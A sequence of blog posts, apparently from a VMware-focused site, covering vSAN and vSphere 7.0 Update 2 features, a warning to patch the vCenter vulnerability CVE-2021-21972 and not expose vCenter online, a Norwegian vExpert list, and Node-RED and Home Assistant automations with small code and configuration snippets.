This is a big one, as it offers a new way of maintaining the latest written data, redundantly, in the event of an unplanned transient error or outage. vSAN 7 Update 2 Unplanned Outage This feature, called Durable Writes, ensures that the latest writes quickly get committed to an additional host, ensuring durability of new data, combined with efficient and fast resyncs of stale components on a recovered or new host. In reality, this almost makes a vSAN policy of FTT=1 act like an FTT=2 policy. In vSAN 7.0 Update 1 this was added for Maintenance Mode operations, but in Update 2 it also comes into play for unplanned outages. This enhancement also includes more frequent checks for silent disk errors.

vSAN support of vSphere Proactive High Availability (HA) #

- Proactive response when a vSAN host detects an impending failure
- Evacuates VMs
- Migrates object data
- Uses plug-ins provided by participating OEM server vendors
- Supports quarantine mode and maintenance mode
- Increased application up-time

Health check history and correlation #

vSAN 7 Update 2 Health Check History

- View a timeline of discrete error conditions
- Gain insight into transient conditions that are difficult to track
- Provides relationships with other alerts: related symptoms or impacts, and the core issue

File Services Improvements #

vSAN File Services also gets a few improvements:

- Support for vSAN stretched clusters and 2-node topologies
- Support for Data-in-Transit Encryption and UNMAP
- Snapshots for file services volumes, via API, including extracting the differences between two snapshots
- Improved scale, performance, and efficiency

The availability of a snapshots API for File Services is great, and I expect backup vendors will jump at being able to back up file shares directly.
The added support for File Services in vSAN Stretched Clusters is also a good addition, and offers affinity settings to ensure local access when available. Stretched Cluster File Services Affinity The new support for 2-node topologies is also welcome, as it offers a real option for consolidating NAS filers in ROBO environments and further reducing the footprint in those environments.

Efficiency Enhancements #

Any efficiency enhancements are welcome, and this release promises a few important ones, improving the cost per I/O:

- Improved performance when using RAID-5/6 erasure codes
- Improved large sequential writes
- Reduced CPU usage
- Improved CPU efficiency writing data to the cache/buffer tier
- Improved small random I/O

vSAN over RDMA #

vSAN over RDMA promises performance increases for vSAN. Initially there is limited hardware support for this configuration available, but expect more RoCEv2 NICs to be certified in the time to come. At the time of release, there are three Mellanox NICs on the HCL. Mellanox NICs on HCL vSAN 7 Update 2 RDMA

- Efficient connectivity for vSAN clusters using RDMA
- Improved CPU utilization and app performance for certain workloads (sequential reads, random mixed reads/writes)
- Supports RDMA over Converged Ethernet v2 (RoCE v2)
- Automatic detection and handling of RDMA adapters

vSAN 7 Update 2 Enable RDMA vSAN 7 Update 2 RDMA Adapters There are also other, minor enhancements in vSAN 7.0 Update 2, and I am sure that more details will emerge in the hours and days after the initial announcement. I will try to maintain a list of official vSAN 7.0 Update 2 resources in the list below, as I find them.
Release Notes #

VMware vSAN 7.0 Update 2 Release Notes

Other Resources #

VMware vSAN 7.0 Update 2 Videos
vSpeaking Podcast Ep 179: VMware vSAN 7 Update 2

---

# VMware vSAN 7.0 Update 2 Videos

URL: https://vNinja.net/2021/03/09/vmware-vsan7u2-videos/
Date: 2021-03-09
Author: christian
Tags: vSphere, vSAN, VMware, ESXi

With the vSAN 7.0 Update 2 announcement, and availability, a series of videos has been published, and here is a list of the videos I’ve found so far.

Video: What’s New in vSAN 7 Update 2 #
Video: How to connect a HCI Mesh Compute Cluster to VMware vSAN 7 Update 2 #
Video: Introducing VMware vSAN 7.0 U2 by Duncan Epping #
Video: Configuring the vSphere Native Key Provider and vSAN Encryption with vSphere/vSAN 7.0u2 by Duncan Epping #
Video: vSAN 7.0 U2 Skyline Health History by Duncan Epping #
Video: Compute only HCI Mesh with vSAN 7.0 U2 by Duncan Epping #
Video: vSAN 7.0 U2 Top Contributors Demo by Duncan Epping #
Video: vSAN 7.0 U2 Custom Capacity Thresholds by Duncan Epping #
Video: vSAN 7.0 U2 Durability Components by Duncan Epping #
Video: vSAN 7.0 U2 stretched cluster integration with vSphere DRS! by Duncan Epping #
Video: vSAN File Services in a Stretched vSAN 7.0 U2 cluster by Duncan Epping #
Video: vSAN 7.0 U1 - Shared Witness Appliance demo by Duncan Epping #
Video: vSAN 7.0 U2 adds extra network metrics by Duncan Epping #
Video: vSAN Enhanced Durability Components and Stretched Clusters by Duncan Epping #

---

# VMware vSphere 7.0 Update 2 Announced

URL: https://vNinja.net/2021/03/09/vmware-vsphere7u2-announced/
Date: 2021-03-09
Author: christian
Tags: vSphere, vSAN, VMware, ESXi

VMware has just announced the general availability of the new vSphere 7.0 Update 2 release, which offers a bunch of new features and improvements.
This includes both new load balancer options for Tanzu, as well as greatly improved security through encryption, better lifecycle management, and improvements to vMotion speeds in high-bandwidth networks. Below is a quickfire list of new features and enhancements.

vSphere with Tanzu #

Integrated Load Balancing with NSX Advanced Load Balancer Essentials #

A new integrated load balancing option in vSphere with Tanzu. This means that there is no longer a requirement for HAProxy in that setup, which was the case in vSphere 7.0 Update 1. New in vSphere 7.0 Update 2 is the NSX Advanced Load Balancer Essentials, which is now included. This does not mean that NSX-T is required; the NSX Advanced Load Balancer Essentials is included in the vSphere for Tanzu license. vSphere with Tanzu Integrated Load Balancing

- Works with vSphere with Tanzu, TKG Cluster Control Plane, and Ingress for Kubernetes Load Balancer Services
- Orchestrated through Network Service & NSX-T
- Highly available & scalable
- Upgrades & lifecycle managed automatically
- Fully supported

Upstream Kubernetes #

- vSphere with Tanzu continues matching upstream Kubernetes versions
- Kubernetes 1.19 support for both the Supervisor cluster and Tanzu Kubernetes Grid
- vSphere with Tanzu makes it easy for organizations to deliver and use the latest features supported by the Kubernetes community

Kubernetes 1.19 in vSphere with Tanzu

Private Registry Support in vSphere with Tanzu #

More flexibility and choice for container registries, through private registry support.
- Use registries with self-signed or internal CA certs
- Useful for organizational registries deployed outside vSphere with Tanzu
- Adds flexibility for enterprise customers in a variety of environments

Artificial Intelligence & Machine Learning #

- Support for the new NVIDIA Ampere family of GPUs
- Multi-Instance GPU (MIG) improves physical isolation between VMs & workloads
- Performance enhancements with GPUDirect & Address Translation Service in the hypervisor

NVIDIA Multi-Instance (MIG) GPU

- Supported with NVIDIA Ampere GPUs
- For AI/ML only (not graphics)
- Extension to the PCIe vGPU profiles
- Isolation in the internal hardware paths provides more predictable levels of performance

vSphere Lifecycle Manager #

vSphere Lifecycle Manager now handles vSphere with Tanzu “supervisor” cluster lifecycle operations as well as traditional virtualization. New in Lifecycle Manager is Desired Image Seeding, where an image can be extracted from an existing host. LCM Extract an image from an existing host NSX-T lifecycle support means all vSphere with Tanzu deployment models are easy to maintain.

Extending vLCM compatibility #

- New vendor plugin for select Hitachi UCP ReadyNode models
- Update recommendations automatically refreshed after common change events: VMware image depot, change in desired image

vSphere Lifecycle Manager CLI Support for vSAN Bootstrap #

- Configure vSAN and vSphere Lifecycle Manager in scripted deployments
- Drive cluster lifecycle from the moment it is created, removing the need for remediation later
- Enables rapid large-scale deployments and automation

ESXi Suspend-to-Memory #

This is an interesting one. While Quick Boot has been available since vSphere 6.7, what’s new is that it can be used in conjunction with the new Suspend-to-Memory option in vSphere 7 Update 2. This means that ESXi hosts can be upgraded without power cycling AND without vMotioning VMs out of the host.
Of course, this means that the VMs will be stunned and suspended during the upgrade process, but in some scenarios that is fine. In large-scale VDI/EUC or AI/ML (GPU) clusters, for instance, you could then do a rolling upgrade of the cluster without having a boot storm or moving lots of workloads around, and at the same time greatly reduce the time it takes to perform an upgrade. It will be interesting to see how quickly an ESXi host can be upgraded using this feature, but rumor has it that it might be seconds instead of (many) minutes compared to a non-Quick Boot upgrade. ESXi Suspend-to-Memory

vMotion Auto Scale #

We have been able to manually tweak vMotion for a while, to ensure maximum performance. Now that vSphere 7 Update 2 is here, it promises to take care of that tuning automatically. This will provide faster vMotions on 25, 40 and 100 GbE links without the need for manual tuning. vMotion now automatically scales the number of streams based on the available bandwidth. One vMotion stream is capable of processing 15 Gbps+, so this will not have an effect on 10 GbE vMotion networks. vSphere 7 Update 2 vMotion Auto Scale

Security #

Quite a few new security features and enhancements are also part of the vSphere 7.0 Update 2 release:

VMware vSphere Native Key Provider #

A new VMware vSphere Native Key Provider makes it easier to enable vSAN Encryption, VM Encryption and vTPM. There is no longer a requirement for an external KMS, but one can still be used if available, making it much easier to get started with encrypting your virtual workloads and storage. vSphere 7 Update 2 vSphere Native Key Provider

- Key provider integrated in vCenter Server & clustered ESXi hosts
- Works with ESXi Key Persistence to eliminate dependencies
- Adds flexible and easy-to-use options for advanced data-at-rest security

ESXi Configuration Encryption #

ESXi Configuration Encryption is enabled automatically, and protects boot volume secrets during service replacements.
Improved by utilizing a hardware TPM if one is available. Virtual Trusted Platform Module (vTPM) support on Linux & Windows # A new Virtual Trusted Platform Module (vTPM) virtual device can be added to modern versions of Microsoft Windows and select Linux distributions. This enables in-guest security that requires TPM support, but it does not require a physical TPM in the host itself. vTPM requires that VM Encryption is enabled. VMware Tools and Guest Content Distribution # VMware Time Provider Plugin for Precision Time on Windows # VMware Tools plugin to synchronize guest clocks with Windows Time Service Added via custom install option in VMware Tools Precision Clock device available in VM Hardware 18+ Supported on Windows 10 and Windows Server 2016+ High quality alternative to traditional time sources like NTP or Active Directory VMware Tools Guest Content Distribution # “Internal CDN” for guest content, available through VMware Tools. This enables content sharing to VMs from a central repository, with granular control over participation and flexibility to choose the available content. The content can be scripts and other files administrators may want to make available inside the VM, directly through VMware Tools. There are also other enhancements in vSphere 7.0 Update 2 that I might have missed, and I am sure that more details will emerge in the hours and days following the initial announcement. I will try to maintain a list of official vSphere 7.0 Update 2 resources in the list below, as I find them.
Release Notes # VMware vCenter Server 7.0 Update 2 Release Notes VMware ESXi 7.0 Update 2 Release Notes VMware vSphere with Tanzu Release Notes Other Resources # What’s New in SRM and vSphere Replication 8.4 vSphere 7.0 Update 2 Videos vSphere 7 Update 2 - REST API Modernization Introducing the vSphere Native Key Provider vSphere With Tanzu - NSX Advanced Load Balancer Essentials Multiple Machine Learning Workloads Using GPUs: New Features in vSphere 7 Update 2 Faster vMotion Makes Balancing Workloads Invisible Load Balancers, Private Registries, and More: What’s New in vSphere with Tanzu U2 --- # VMware vSphere 7.0 Update 2 Videos URL: https://vNinja.net/2021/03/09/vmware-vsphere7u2-videos/ Date: 2021-03-09 Author: christian Tags: vSphere, vSAN, VMware, ESXi With the vSphere 7.0 Update 2 announcement, and availability, a series of videos has been published, and here is a list of the videos I’ve found so far: Video: What’s New in vSphere 7 Update 2 in 10 Minutes # Video: vSphere With Tanzu - NSX Advanced Load Balancer Essentials # Video: Introduction to vSphere Native Key Provider # Video: vSphere Lifecycle Manager - Host Seeding Demo # Video: vQuicker ESXi Host Upgrades with Suspend to Memory # Video: vSphere 7.0 U2 Suspend VM to Memory by Duncan Epping # --- # Is Your VMware vCenter Publicly Available? URL: https://vNinja.net/2021/02/27/is-your-vcenter-publicly-available/ Date: 2021-02-27 Author: christian Tags: vCenter, VMware On the 23rd of February 2021 VMware issued the VMSA-2021-0002 security advisory, and one of the issues it addresses is VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client (CVE-2021-21972). This is a critical issue, and if left unpatched it could land your vSphere estate in big trouble, as there are already Proof-of-Concepts available for this vulnerability. So get patching as soon as possible.
Of course, this can only be exploited if you have access to the vSphere Client, so if the management plane is isolated that helps mitigate the risk. What worries me though, is that according to zdnet.com, “More than 6,700 VMware servers exposed online and vulnerable to major new bug”. If these numbers are indeed correct, a lot of VI Admins need to take a real hard look in the mirror. That being said, all zdnet seems to have done is a Shodan scan for vCenter instances, without actually checking whether any of the results are indeed vulnerable, even if they state the following: More than 6,700 VMware vCenter servers are currently exposed online and vulnerable to a new attack that can allow hackers to take over unpatched devices and effectively take over companies’ entire networks. That many instances are probably not vulnerable, as “only” vCenter versions prior to 6.5 U3n, 6.7 U3l and 7.0 U1c are vulnerable, and a bunch of those found in Shodan are most likely already patched, or running older versions. The real number of available and vulnerable instances is probably a lot lower than 6,700, but that doesn’t mean that there aren’t a lot of systems out there waiting to be attacked. Apparently there are already automated scans out there, looking for installations to exploit. Also, when your vCenter is exposed, so are your ESXi hosts, and that leaves you open to ransomware attacks from the likes of CARBON SPIDER and SPRITE SPIDER. Once that happens, you’re in for a very bad day, week or even month. Lars Trøen has posted a nice Twitter thread about the same, linking to Shodan searches and a Proof-of-Concept for the exploit: There is no reason to host neither your vCenter nor ESXi host on the public internet.
https://t.co/la0KzXBiMS — Lars Troen (@larstr) February 28, 2021 Summary of his links from the thread: Shodan Search for vCenters Shodan Search for ESXi hosts PoC Unauthorized RCE in VMware vCenter The ESXi ransomware post-mortem (Reddit user NetInfused) To be blunt: there is simply no valid reason why your VMware vCenter, or ESXi hosts, should be available over the internet. None whatsoever. In fact, it shouldn’t even be available from non-admin clients in your local network, let alone via the internet. If that is the case in your environment, odds are that there are other big issues present in your infrastructure as well. I am not saying that if you expose your VMware vCenter to the internet you deserve to be exploited, but I am really, really close. Patch your stuff, and don’t expose your infrastructure to the internet. Simple. --- # Norwegian vExperts 2021 URL: https://vNinja.net/2021/02/12/norwegian-vexperts-2021/ Date: 2021-02-12 Author: christian Tags: vExpert, VMware VMware has just announced the list of vExperts for 2021, and true to tradition, here is a list of the Norwegian vExperts for 2021. This year there is a total of 13 Norwegian vExperts, one more than in 2020. If you want to be included in this list when it opens up again in June 2021, it’s time to start planning. As a vExpert Pro I’m happy to assist anyone who wants help applying! Norwegian vExperts 2021 (February) #

| Name | Twitter | Blog |
| --- | --- | --- |
| William Brown | n/a | sevenlogic.io |
| Morten Werner Forsbring | @forsbring | n/a |
| Frode Garnes | @frode_garnes | n/a |
| Bengt Grønås | @bgronas | blog.bengt.no |
| Rudi Martinsen | @RudiMartinsen | rudimartinsen.com |
| Christian Mohn | @h0bbel | vNinja.net |
| Bjørn-Tore Nikolaisen | @btn003 | n/a |
| Børre Nygren | @borrenygren | n/a |
| Roger Samdal | @rsamdal | vfokus.no |
| Marius Sandbu | @msandbu | msandbu.org |
| Bjørn Sørensen | @bjosoren | tech.iot-it.no |
| Lars Trøen | @larstr | core-four.info |
| Andreas Vedå | @Andyve | vedaa.net |

That’s quite a list!
Out of those 13, I’d like to especially congratulate William Brown on his inaugural inclusion! You can also check the entire official vExpert Directory for a complete list of the vExpert class of 2021. --- # Making a Node-RED Twitter Bot URL: https://vNinja.net/2021/01/20/node-red-twitter-bot/ Date: 2021-01-20 Author: christian Tags: Node-RED, Twitter, Automation I use Node-RED extensively for home automation purposes, in conjunction with Home Assistant. See the Home Automation tag for posts in that series. This post, however, is for a different use case and not home automation. For years I’ve been using Zapier to automatically tweet new posts for this site via the @vninjanet account, but that has proven rather inflexible, and I wanted a better way to automate this, while adding features that Zapier currently does not support, like adding specific hashtags automatically. I have been using the site’s RSS feed as the trigger in Zapier, and wanted to continue doing that, even when moving it to Node-RED. Project Outline # Automatically tweet when a new post is published Ability to add hashtags to the tweet itself, from Hugo Learn something in the process Since I already have Node-RED up and running, it was a natural choice to start looking for ways to accomplish this with that tool. As it turns out, Node-RED already has nodes for RSS feed parsing and Twitter, so the bulk of it already exists. The solution I ended up with is a combination of several things in order to make everything work together. Customizing the Hugo RSS Feed # First off, I needed to customize the Hugo RSS feed to make sure the Twitter hashtags I wanted to include were also included in the RSS feed.
Using Adding Author tag to RSS Feed using Hugo static site generator as a starting point, I added the following to my rss.xml file as the last line before `</item>`:

```xml
<category>{{ .Params.hashtags }}</category>
```

This picks up whatever I have put in a post’s front matter, under the hashtags variable, like this:

```yaml
hashtags: node-red, automation
```

After verifying that this indeed shows up in the feed, I moved on to Node-RED to create the flow. Node-RED Flow # The final flow looks like this: 1. Feedparser node (vNinja) # The feedparser node is pretty simple, all it needs is a valid feed URL, which in this case points to this site’s feed. The only other configuration items are the refresh schedule, and a name. 2. rbe node # The rbe node, report-by-exception, is there to ensure that the flow only triggers if there is a change in the feed: it only passes data along if the input data has changed, like when a new item appears in the feed that the feedparser node monitors. While testing this flow on a test Twitter account, the account got temporarily suspended after posting >300 tweets in a few seconds, and the rbe node is there to ensure that doesn’t happen again… 3. Function node (Format Tweet) # The function node is where I get into deep water. I am not a developer, and have not really done anything in JavaScript before. But, in order to format the data received from the feedparser node into something that can be passed on to the Twitter node, I had to get my hands dirty.
In the feed, after the edits I did in Customizing the Hugo RSS Feed, the hashtags defined in the front matter look like this:

```xml
<category>node-red, automation</category>
```

In order to separate these out and prepend the hash, I used the following JavaScript code in the function node:

```javascript
var hashtags = msg.article.categories[0];
var splitHashtags = hashtags.replace(/, /g, " #");
var finalHashTags = "#" + splitHashtags;
var tweet = "New post: " + msg.article.title + " " + msg.article.link + " " + finalHashTags;
msg.payload = tweet;
return msg;
```

Caveat emptor: I am no developer. Never have been. There are probably far better ways of doing this in JavaScript, but it’s what I hacked together with next to no experience. Basically this takes the input contained in the categories element of the feed, replaces each comma separator with a space and a hash, and prepends a hash to the first tag before storing the result in the msg.payload variable. It also adds New post:, the title of the post and the link to the post before it appends the hashtags to the end of the string. This is pretty fragile, and will certainly not work right if I don’t define my hashtags in the front matter correctly, as it expects them to be separated by commas and to not already include the hash symbol. There should probably be some error checking in there as well, but for now this is what I have. 4. Twitter out node (Tweet vNinja.net post) # The last node in the flow is the Twitter out node. Before it can be used, it needs to be configured with proper Twitter credentials, like API keys and Access tokens. You can get yours at developer.twitter.com/en/apps. Once that’s configured, the Twitter out node will compose a tweet of whatever gets passed to it in the msg.payload object. Since the function node takes care of the formatting, that’s all the configuration that is needed.
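As a hedged aside, the same formatting could be done a bit more defensively. This is a sketch of my own, not the flow from the post; the whitespace trimming, empty-entry filtering and duplicate-hash guard are additions:

```javascript
// Hedged sketch: a more defensive variant of the Format Tweet function
// node. This is NOT the original flow; the trimming, empty-entry
// filtering and duplicate-hash guard are my additions.
function formatTweet(article) {
    // The feedparser node puts the <category> text in article.categories[0]
    var raw = (article.categories && article.categories[0]) || "";
    var hashtags = raw
        .split(",")                                        // "a, b" -> ["a", " b"]
        .map(function (tag) { return tag.trim(); })        // tolerate stray whitespace
        .filter(function (tag) { return tag.length > 0; }) // drop empty entries
        .map(function (tag) { return "#" + tag.replace(/^#+/, ""); }) // avoid "##tag"
        .join(" ");
    return ("New post: " + article.title + " " + article.link + " " + hashtags).trim();
}

// Inside the function node this would become:
// msg.payload = formatTweet(msg.article);
// return msg;
```

The behaviour is the same for well-formed front matter, but stray whitespace, an empty tag, or an accidental leading hash no longer breaks the tweet.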
If everything still works as it did during testing, this post should now be autotweeted via @vninjanet with a tweet that looks something like this: New post: Making a Node-RED Twitter Bot https://vninja.net/2021/01/20/node-red-twitter-bot/ #node-red #automation Let’s hope it still works! I’ll post the tweet below here once it is published. New post: Making a Node-RED Twitter Bot https://t.co/3NX1tWGh55 #node-red #automation — vninja.net (@vninjanet) January 20, 2021 This accomplished everything I set out to do, and I learned something in the process. --- # How I Use Home Assistant: Part 4 — Automatically Enable and Disable Sonos Night Mode with Node-RED URL: https://vNinja.net/2021/01/03/how-i-use-home-assistant-part4/ Date: 2021-01-03 Author: christian Tags: Home Assistant, Home Automation, Node-RED, Sonos Sonos Beam is my main driver for television audio, which is great, but the sound travels between the floors in my house, so I want Night Mode to be enabled late at night. I also do not want to have to manually tweak the night mode settings through the Sonos App, and figured that doing it on a schedule, from within Home Assistant, was the way to go. This series of posts is not intended to be a Node-RED and Home Assistant 101 introduction. There are other resources for that readily available, that do a very good job of explaining how to get up and running: Install Home Assistant Node-RED Getting Started How to get started with Node-RED and Home Assistant Workflow description # At a given time, enable Night Mode on my Sonos At a given time, disable Night Mode on my Sonos Profit In order to get this working, the following Home Assistant integrations and Add-ons need to be installed and configured: Node-RED Sonos Mobile App My final workflow looks like this: Node-RED Workflow Walkthrough # 1. Bigtimer Node Like in my Morning Coffee workflow, this one kicks off with a Bigtimer Node. The On Time item is set to 23:00, and the Off Time is set to 08:00.
Switch Node The second part of the workflow is a simple switch node, that differentiates between an on or an off event from the Bigtimer Node. This basically just takes the output from the Bigtimer Node, which is either a value of on or off, and decides the flow from there. The topmost connector on the right hand side is the first value, which in this case is on, and the second one is a value of off. Call Service Nodes Depending on whether the value from the Switch Node is on or off, it calls a service in Home Assistant. If the event is on, it proceeds to run Sonos: Enable Night Settings. If the event is off, then it runs Sonos: Disable Night Settings. Sonos: Enable Night Setting # The Call Service Node: Sonos: Enable Night Setting sends a service call to the Sonos integration, with a pre-defined payload. Name is your chosen name, Server is Home Assistant, Domain is Sonos and the Service to call is set_option. In Entity Id the desired Sonos media player is selected. Devices can be grouped in Home Assistant, and a service call can be sent to a group if you want this to happen to all your Sonos devices, should you have more than one. For the Data field, the following JSON needs to be put in place: Data Payload # This payload sets Sonos Night Sound to on, enables Speech Enhancement and turns off the Status Light on the device. Although I can clearly hear it when the Sonos changes to Night Mode, being able to quickly see the current status by looking at the Status Light is a nice way to verify it. Sonos: Disable Night Settings # The Call Service Node: Sonos: Disable Night Setting sends a service call to the Sonos integration. This is basically a copy of the Sonos: Enable Night Setting one, with a different name and a different payload in Data. Name is your chosen name, Server is Home Assistant, Domain is Sonos and the Service to call is set_option. In Entity Id the desired Sonos media player is selected.
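The actual JSON payloads do not survive in this text export. Based on the descriptions in this walkthrough, and assuming the Home Assistant Sonos integration’s set_option fields (night_sound, speech_enhance and status_light), the Enable Night Setting payload would look something like this sketch:

```json
{
  "night_sound": true,
  "speech_enhance": true,
  "status_light": false
}
```

The Disable payload described next would then be the same object with night_sound and speech_enhance set to false and status_light set to true.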
Data Payload # This payload sets Sonos Night Sound to off, disables Speech Enhancement and turns on the Status Light on the device. Call Service Node: Notify In this one, I have also connected another Call Service Node to send a notification to my phone when the workflow runs. Name is your chosen name, Server is yet again Home Assistant, Domain is notify and the Service to call is mobile_app_your_device. No need to put in an Entity Id for this one. Data Payload # Emojis and all! Workflow # Once all of the nodes are configured, and available in the Node-RED canvas, it’s just a matter of connecting them together like this: --- # How I Use Home Assistant: Part 3 — Morning Coffee URL: https://vNinja.net/2021/01/03/how-i-use-home-assistant-part3/ Date: 2021-01-03 Author: christian Tags: Home Assistant, Home Automation, Node-RED, IKEA Trådfri I need my caffeine fix. It also needs to be very readily available when I wake up. Before home automation, I used to load my Moccamaster KBGT741 Thermal Coffee Maker with water and ground coffee before bedtime, so all I had to do was hit the power button to get caffeine flowing. But why not schedule it for before I get up, so that there is always fresh coffee available the instant I get up in the morning? Add an IKEA Trådfri Smart Outlet, and I can schedule my fix! Since the coffee maker brews into an insulated carafe, the coffee doesn’t get burnt if I sleep in, while staying hot at the same time. Now that is a big win! I know, this method doesn’t provide the absolute best coffee experience, but as far as I’m concerned, availability beats quality in the wee hours of the morning. This series of posts is not intended to be a Node-RED and Home Assistant 101 introduction.
There are other resources for that readily available, that do a very good job of explaining how to get up and running: Install Home Assistant Node-RED Getting Started How to get started with Node-RED and Home Assistant Workflow description # At a given time, power on a smart outlet. Specifically the one my coffee maker is connected to. Fresh pots Profit In order to get this working, the following Home Assistant integrations and Add-ons need to be installed and configured: Node-RED IKEA Trådfri My final workflow looks like this: This workflow looks a bit more complex than my Light Color Changes for Calendar Based Events one, but in reality it isn’t much harder to set up. Node-RED Workflow Walkthrough # 1. Bigtimer Node The Bigtimer node is really great, and can be used for a plethora of time based events. In this workflow I’m only using it as a simple scheduler, which triggers an on event at a given time, and an off event at another time. Bigtimer Node All I do here is set its output to on at 07:15 and off at 07:45. The ON Msg is set to on and OFF Msg is set to off, as those are the states that the IKEA Trådfri Smart Outlet expects to receive. You can check those values in http://your-ha-instance:8123/developer-tools/state, and test setting states there. The only other setting that’s changed from default, in my setup, is that I’ve disabled the Repeat output setting at the bottom of the Bigtimer Node properties, as there is no need to repeat it once it’s fired. Bigtimer Node Repeat Output The topmost connector on the right hand side of the Bigtimer Node is the on time / off time selector, which will be connected to the next node in the workflow, the Switch Node. Switch Node The second part of the workflow is a simple switch node, that differentiates between an on or an off event from the Bigtimer Node. This basically just takes the output from the Bigtimer Node, which is either a value of on or off, and decides the flow from there.
The topmost connector on the right hand side is the first value, which in this case is on, and the second one is a value of off. Call Service Nodes Depending on whether the value from the Switch Node is on or off, it calls a service in Home Assistant. If the event is on, it proceeds to the Call Service Node: Make Coffee. If the event is off, then it runs the Call Service Node: Turn Off. Call Service Node: Make Coffee # The Call Service Node: Make Coffee simply turns the selected smart outlet on. Name is your chosen name, Server is Home Assistant, Domain is switch and the Service to call is turn_on. In Entity Id the desired smart outlet is selected, and that’s it. There is no need for any additional payloads in this node. Call Service Node: Turn Off # The Call Service Node: Turn Off turns the selected smart outlet off. It is basically a copy of the Make Coffee one, with a different name and one small edit. Name is your chosen name, Server is Home Assistant, Domain is switch and the Service to call is turn_off. In Entity Id the desired smart outlet is selected, and that’s it. Like above, there is no need for any additional payloads in this node. Inject Nodes The two other nodes in my workflow are inject nodes. These are very useful, especially when working with timed events, as they provide a way to force an event to happen — regardless of the timer schedule set up in the Bigtimer Node. Force On # All this does is forcefully send a msg.payload of on to the connected Switch Node, thus making the workflow trigger the same way as a timed on message from the Bigtimer Node. The Inject Nodes are triggered manually by clicking on the square on the left hand side of the node. Force Off # Same as the Force On Inject Node, but this one sends a msg.payload of off to the Switch Node.
Workflow # Once all of the nodes are configured, and available in the Node-RED canvas, it’s just a matter of connecting them together like this: Once the workflow works as intended, the Inject Nodes can be removed, but I like keeping them around as easy debug tools while developing time based workflows. Nothing is more annoying than having to wait until a given time for something to happen, only to find that it doesn’t work. That’s how I ensure my caffeine fix is ready when I wake up, courtesy of Home Assistant, Node-RED and IKEA Trådfri. --- # How I Use Home Assistant: Part 2 — Light Color Changes for Calendar Based Events with Node-RED URL: https://vNinja.net/2021/01/02/how-i-use-home-assistant-part2/ Date: 2021-01-02 Author: christian Tags: Home Assistant, Home Automation, Node-RED In my hallway there are a few Philips Hue White and Color Ambiance Bulbs that I’ve had some fun with over the last couple of years. Originally automated through IFTTT, they change color if one of my favorite football teams plays a match. This has been working well for quite some time, but with IFTTT recently starting to limit the number of Applets you can create, and the fact that they only run every 15 minutes, I decided to try to emulate that functionality with Home Assistant and Node-RED instead. This series of posts is not intended to be a Node-RED and Home Assistant 101 introduction.
There are other resources for that readily available, that do a very good job of explaining how to get up and running: Install Home Assistant Node-RED Getting Started How to get started with Node-RED and Home Assistant My Workflow description # Check a calendar for match events When a match starts, change the light color to the correct RGB value Profit In order to get this working, there are a couple of Home Assistant Integrations and Add-ons that need to be installed and configured: Node-RED Philips Hue Google Calendar Event Of course, I also need the fixture lists available in Google Calendar, which is easily done by subscribing to publicly available calendars. fixtur.es takes care of that part, and seems to be doing a very good job of updating the calendars if there are changes. I based my previous IFTTT workflows on the same calendar, and it has worked well for years. Once the calendars are available in Home Assistant, you can start automating based on the events in them. My final workflow looks like this: Node-RED and Home Assistant Workflow Walkthrough # 1. Trigger: State Node First there is a Trigger: State Node that checks the corresponding calendar for events. Name is my given name for the trigger. Server is Home Assistant, and the Entity ID is the device_id name given for the calendar in its configuration in google_calendars.yaml, prefixed by calendar. In this setup, the entity id is calendar.liverpool.

```yaml
- cal_id: xyz@import.calendar.google.com
  entities:
    - device_id: liverpool
      ignore_availability: true
      name: Fixtures Liverpool
      track: true
```

The way the calendar integration works is that if there is an event in calendar.yourname, its state is on. If it’s on, there is a match, so we can work from that. 2. Call Service Node The next is a Call Service Node, that calls a service within Home Assistant, to make something happen. Name is once again the name I gave it, Server is Home Assistant.
Since we’re changing a light, the Domain is light, the entity id is the light, or group of lights in this case (these bulbs are grouped in Home Assistant into one group, light.hallway), and the Service we want to call is turn_on. The turn_on service works even if the light is already on, so there is no need to create any logic around checking if the light(s) are on or off before sending data to them. The “magic” here is within the Data field, which is where the payload we send to the Hue integration is stored. 3. Payloads In this case, I want to change the light color, and brightness, so the JSON contained in the data field looks like this: Liverpool FC # This sets the color to the RGB value of 208,0,39, and maximum brightness of 255. Since this example uses the Liverpool FC calendar, I picked the RGB value for the light from their official logo. I did the same, and used a different color value, for the SK Brann trigger: SK Brann # Workflow # Once all the different nodes are configured, it’s just a matter of connecting them together to create a full workflow. The topmost connector on the node is the one that gets triggered when a calendar event is “on”, so in this automation I have only connected an action there. If there is nothing in the calendar, I don’t want to do anything, so I leave that as is. Duplicate this for any other calendar events, and / or colors you want, and that’s it. In the screenshot above, there is also a Debug Node connected, just to make sure I catch debug data when the events trigger. I am sure there are loads of other use cases for calendar based automation in Home Assistant, and this might not be the most useful automation ever, but it is a fun one! There are probably many other use cases for this as well, like special lighting for your spouse’s or kids’ birthdays.
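The payload screenshots from the Payloads step above are not reproduced in this export. Based on the description, and assuming the standard Home Assistant light.turn_on service data fields (rgb_color and brightness), the Liverpool FC payload would look roughly like this sketch; the SK Brann one would be the same shape with its own RGB value:

```json
{
  "rgb_color": [208, 0, 39],
  "brightness": 255
}
```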
--- # How I Use Home Assistant: Part 1 — My Setup URL: https://vNinja.net/2021/01/01/how-i-use-home-assistant/ Date: 2021-01-01 Author: christian Tags: Home Assistant, Home Automation, Node-RED I’ve been running Home Assistant (HA) in my network for well over a year now, and its primary use case has been connecting devices from different ecosystems into one management interface. Lately I have been migrating a few automations from native HA to Node-RED, which has been a fun exercise, and I’m looking to expand the usage of automations in the time to come. My mantra for this setup is that everything that can be automated, should be automated, while at the same time keeping it as simple and unobtrusive as possible for everyone in the household. As I’ve written about earlier, my IoT devices are split into a separate network, but that has not been a problem when integrating the various services into HA. Below is a list of integrations, add-ons and automations I have running in my current configuration: Home Assistant Integrations # IKEA TRÅDFRI — Most of my bulbs and socket switches are IKEA Trådfri based. Currently there are 31 devices connected to it. Philips Hue — Bulbs and Lights. 22 in total Verisure — Home Alarm System, with motion sensors and socket switches Netatmo — Used for outside and indoor climate readings Pi-hole — Blocks trackers and ads in my network (setup), and this integration provides nice statistics for my HA Dashboards Plex Media Server — Enables event triggers when something is playing on Plex Sonos — Sonos Beam connected to my Samsung TV Synology DSM — Provides sensors for my Synology NAS Volumio — Volumio on a Raspberry Pi provides me with streaming features for my old stereo amplifier (setup) Elgato Key Light — Home Office video lighting Easee EV Charger — Monitoring and managing my EV Charger.
